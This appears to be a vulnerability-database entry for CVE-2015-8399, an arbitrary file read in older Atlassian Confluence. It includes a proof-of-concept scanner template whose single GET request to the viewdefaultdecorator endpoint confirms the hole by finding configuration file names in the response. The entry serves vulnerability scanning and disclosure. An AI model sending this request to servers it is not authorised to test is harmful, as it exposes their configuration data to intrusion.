CVE-2015-8399: Atlassian Confluence configuration files read

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Atlassian Confluence before 5.9.1 allows remote attackers to read arbitrary files via a crafted request.

PoC代码[已公开]

id: CVE-2015-8399

info:
  name: Atlassian Confluence configuration files read
  author: whynot
  severity: medium
  description: |-
    Atlassian Confluence before 5.9.1 allows remote attackers to read arbitrary files via a crafted request.
  reference:
    - https://www.elastic.co/community/security
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8399
  tags: cve,cve2015,confluence,fileread
  created: 2023/07/13

rules:
  r0:
    request:
      method: GET
      path: /spaces/viewdefaultdecorator.action?decoratorName
    expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2015/CVE-2015-8399.yaml